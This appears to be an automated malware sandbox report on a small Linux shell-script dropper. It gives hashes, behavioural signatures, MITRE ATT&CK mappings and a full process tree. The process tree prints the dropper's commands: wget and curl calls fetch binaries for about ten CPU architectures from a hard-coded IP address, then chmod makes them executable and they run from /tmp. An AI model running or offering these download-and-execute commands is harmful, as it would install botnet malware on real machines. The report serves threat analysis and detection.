Analysis
-
max time kernel
26s -
max time network
64s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
24/11/2024, 01:19
Static task
static1
Behavioral task
behavioral1
Sample
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
-
Size
1KB
-
MD5
513641f5f60d55559c2060489de6d605
-
SHA1
c95feec2255732b60d434b0639b88a5cff205ea0
-
SHA256
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd
-
SHA512
71ee20fe10e58b1d9a0e0e5268ba264e35e15e3a5190cfdf5950245579fbbdabd9aef7dc11e9398e0df8add1afb1400a0134911b6ebb9deb937b578fc52775e0
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 689 chmod 710 chmod 741 chmod 791 chmod 809 chmod 761 chmod 797 chmod 803 chmod 815 chmod 823 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/3AvA 690 3AvA /tmp/3AvA 711 3AvA /tmp/3AvA 743 3AvA /tmp/3AvA 762 3AvA /tmp/3AvA 792 3AvA /tmp/3AvA 798 3AvA /tmp/3AvA 804 3AvA /tmp/3AvA 810 3AvA /tmp/3AvA 816 3AvA /tmp/3AvA 824 3AvA -
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 692 wget 693 curl 708 cat 711 3AvA -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/3AvA 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Processes
-
/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh1⤵
- Writes file to tmp directory
PID:659 -
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.x862⤵PID:661
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.x862⤵
- Checks CPU configuration
- Reads runtime system information
PID:673
-
-
/bin/catcat UnHAnaAW.x862⤵PID:688
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF2⤵
- File and Directory Permissions Modification
PID:689
-
-
/tmp/3AvA./3AvA x862⤵
- Executes dropped EXE
PID:690
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.mips2⤵
- System Network Configuration Discovery
PID:692
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:693
-
-
/bin/catcat UnHAnaAW.mips2⤵
- System Network Configuration Discovery
PID:708
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF2⤵
- File and Directory Permissions Modification
PID:710
-
-
/tmp/3AvA./3AvA mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:711
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.mpsl2⤵PID:714
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
PID:718
-
-
/bin/catcat UnHAnaAW.mpsl2⤵PID:740
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/3AvA./3AvA mpsl2⤵
- Executes dropped EXE
PID:743
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm42⤵PID:747
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm42⤵
- Checks CPU configuration
- Reads runtime system information
PID:752
-
-
/bin/catcat UnHAnaAW.arm42⤵PID:760
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF2⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/3AvA./3AvA arm42⤵
- Executes dropped EXE
PID:762
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm52⤵PID:765
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm52⤵
- Checks CPU configuration
- Reads runtime system information
PID:769
-
-
/bin/catcat UnHAnaAW.arm52⤵PID:790
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/3AvA./3AvA arm52⤵
- Executes dropped EXE
PID:792
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm62⤵PID:794
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm62⤵
- Checks CPU configuration
- Reads runtime system information
PID:795
-
-
/bin/catcat UnHAnaAW.arm62⤵PID:796
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/3AvA./3AvA arm62⤵
- Executes dropped EXE
PID:798
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm72⤵PID:800
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm72⤵
- Checks CPU configuration
- Reads runtime system information
PID:801
-
-
/bin/catcat UnHAnaAW.arm72⤵PID:802
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF2⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/3AvA./3AvA arm72⤵
- Executes dropped EXE
PID:804
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.ppc2⤵PID:806
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
PID:807
-
-
/bin/catcat UnHAnaAW.ppc2⤵PID:808
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/3AvA./3AvA ppc2⤵
- Executes dropped EXE
PID:810
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.m68k2⤵PID:812
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
PID:813
-
-
/bin/catcat UnHAnaAW.m68k2⤵PID:814
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/3AvA./3AvA m68k2⤵
- Executes dropped EXE
PID:816
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.sh42⤵PID:818
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.sh42⤵
- Checks CPU configuration
- Reads runtime system information
PID:821
-
-
/bin/catcat UnHAnaAW.sh42⤵PID:822
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/3AvA./3AvA sh42⤵
- Executes dropped EXE
PID:824
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1